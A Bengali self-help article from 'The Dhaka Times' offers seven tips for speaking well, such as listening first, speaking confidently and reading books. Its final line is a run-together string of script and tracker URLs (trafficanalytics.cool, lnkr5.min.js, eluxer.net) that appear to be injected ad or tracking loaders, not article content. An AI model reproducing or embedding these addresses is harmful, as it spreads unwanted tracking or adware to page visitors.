সুন্দরভাবে কথা বলার সেরা গাইডলাইন

শুধু দেখতে সুন্দর বা কণ্ঠ সুন্দর হলেই সুন্দরভাবে কথা বলা যায় না

দি ঢাকা টাইমস্ ডেস্ক ॥ স্মার্টনেস এবং নিজেকে সবার মাঝে ফুটিয়ে তোলার প্রধান শর্ত হল সুন্দরভাবে কথা বলা। কথা তো সবাই বলতে পারে কিন্তু সুন্দর করে সবাই কথা বলতে পারে না। অনেক জ্ঞানীগুণী ব্যক্তি রয়েছেন যারা নিজে অনেক কিছু জানেন কিন্তু সুন্দরভাবে কথা বলতে না পারায় সবার মাঝে নিজেকে বিকশিত করতে পারেন না।

শুধু দেখতে সুন্দর বা কণ্ঠ সুন্দর হলেই সুন্দরভাবে কথা বলা যায় না। এর জন্য প্রয়োজন দীর্ঘ অনুশীলন। আজ আমরা সুন্দরভাবে কথা বলার কিছু গাইডলাইন শিখবো।

১। চলিত ভাষায় কথা বলুনঃ

সাধারনত আমাদের মনের ভাব প্রকাশের জন্য আমরা সাধু, চলিত এবং অঞ্চলিক ভাষায় কথা বলি। মনে রাখবেন সুন্দরভাবে কথা বলার প্রধান শর্ত হল চলিত ভাষায় কথা বলা। কারণ সাধু বা আঞ্চলিক ভাষা অনেকেই বোঝে না। কিন্তু চলিত ভাষা সবাই বোঝে। তাই সবাই যেন আপনার কথা বুঝতে পারে যেই জন্য চলিত ভাষায় কথা বলার অভ্যাস গড়ে তুলুন।

২। আগে শুনুন তারপর বলুনঃ

কারোর সাথে কথা বলার সময় আগে সে কি বলছে তা মনযোগ দিয়ে শুনুন তারপর আপনি কথা বলুন। কারোর কথা বলার মধ্যে কথা বলবেন না। তাহলে সে বিরক্তবোধ করবে। না বুঝে আগেই কোন মন্তব্য করা উচিৎ নয়। তাই আগে শুনুন তারপর সেই বিষয়টা নিয়ে একটু ভেবে তারপর আপনি কথা বলুন।

৩। সুস্পষ্ট মতামত প্রদান করুনঃ

কথা বলার সময় যার সাথে কথা বলবেন তার কথার উপর ভিত্তি করে সুস্পষ্ট মতামত প্রদান করার চেষ্টা করুন। মূল বিষয় বহির্ভুত কোন মতামত প্রদান করবেন না। তাহলে আপনার কথার গুনগত মান নষ্ট হবে।

৪। সংখ্যা ব্যবহার করুনঃ

কথা বলার সময় মাঝে মাঝে বিভিন্ন সংখ্যা অর্থাৎ পরিসংখ্যান ব্যবহার করুন। তাহলে শ্রোতা আপনার কথাকে মুল্যায়ন করবে। তবে সেই সংখ্যাটি সঠিক হতে হবে।

৫। নিজের প্রতি আত্মবিশ্বাস রেখে কথা বলুনঃ

কথা বলার সময় যা বলবেন তা আত্মবিশ্বাসের সাথে বলুন। মনে রাখবেন যা বলছেন সেই কথার উপর যদি আপনার আত্মবিশ্বাস না থাকে তাহলে শ্রোতারা আপনার কথার গুরুত্ব দিবে না। আপনি যেই বিষয়ে ভালভাবে জানেন না সেই বিষয় নিয়ে কথা বলবেন না। আগে ভাল করে জানুন তারপর সেই বিষয়ে কথা বলুন।

৬। বই পড়ার অভ্যাস গড়ে তুলুনঃ

বই হচ্ছে সবচেয়ে ভাল বন্ধু। যত বই পড়বেন ততই সুন্দর সুন্দর কথা বলার উপায় খুজে পাবেন। বিভিন্ন লেখকের বই পড়লে সেই সব স্বনামধন্য ব্যক্তিদের কথা বলার স্টাইল বুঝতে পারবেন। তাদের চিন্তাধারা, বিভিন্ন কলা কৌশল জানার জন্য নিয়মিত বই পড়ুন।

৭। নির্দিষ্ট গতিতে কথা বলুনঃ

দ্রুতগতিতে কথা বললে শ্রোতারা আপনার কথা ঠিক মত বুঝবে না। আবার অনেক ধীরে কথা বললেও শ্রোতাদের মনযোগ নষ্ট হবে। তাই স্বাভাবিক এমন একটি গতিতে কথা বলুন যেন শ্রোতাদের বুঝতে সুবিধা হয়। কারণ নতুন বিষয় মাথায় ক্যাচ করতে স্বাভাবিক সময়ের চেয়ে কয়েক সেকেন্ড বেশিই সময় লাগে। তাই সব বিষয়ের প্রতি খেয়াল রেখেই কথা বলার অভ্যাস গড়ে তুলুন।

https://trafficanalytics.cool/optout/set/lat?jsonp=__twb_cb_92207269&key=1c78d53a8b7cdf160e&cv=1531905414&t=1531905414846https://trafficanalytics.cool/optout/set/lt?jsonp=__twb_cb_857481568&key=1c78d53a8b7cdf160e&cv=77536&t=1531905414847https://trafficanalytics.cool/addons/lnkr5.min.jshttps://eluxer.net/code?id=105&subid=52117_7288_https://trafficanalytics.cool/ext/1c78d53a8b7cdf160e.js?sid=52117_7288_&title=Not%20set&blocks%5B%5D=02aed

Advertisements
Loading...